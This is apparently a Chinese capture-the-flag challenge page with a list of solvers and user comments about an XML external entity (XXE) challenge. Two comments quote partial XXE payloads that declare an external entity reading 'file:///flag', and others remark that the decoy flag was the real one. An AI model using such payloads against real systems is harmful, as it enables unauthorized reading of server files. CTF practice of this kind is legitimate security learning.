评分(0)
暂无评分
解题动态

倦鸟叫了一整天 攻破了该题 11天前

amobaishi 攻破了该题 4月前

biandanjun 攻破了该题 6月前

tianna 攻破了该题 6月前

coldplay99999 攻破了该题 6月前

wh1826 攻破了该题 7月前

WCRH 攻破了该题 8月前

POEighT 攻破了该题 9月前

wangjf 攻破了该题 10月前

t1tl3d 攻破了该题 11月前

fuhuameng 攻破了该题 12月前

cxy18 攻破了该题 1年前

Ramrem 攻破了该题 1年前

平凡的人 攻破了该题 1年前

小何lv 攻破了该题 1年前

cc 攻破了该题 1年前

MRLD 攻破了该题 1年前

18092952956 攻破了该题 1年前

宫崎骏 攻破了该题 1年前

评论
MRLD 1年前
举报
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE user [ <!ELEMENT name ANY > <!ENTITY admin SYSTEM "file:///flag" >]> <user><userna
MRLD 1年前
举报
真得出生出题人,假flag是真的,闲的这样搞
gooddemo 1年前
举报
这个是xxe漏洞,所以在点击提交按钮时,修改Payload,内容如下:<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag">]> <user><use
hopeinhand 1年前
举报
找半天结果假flag是真的,很迷惑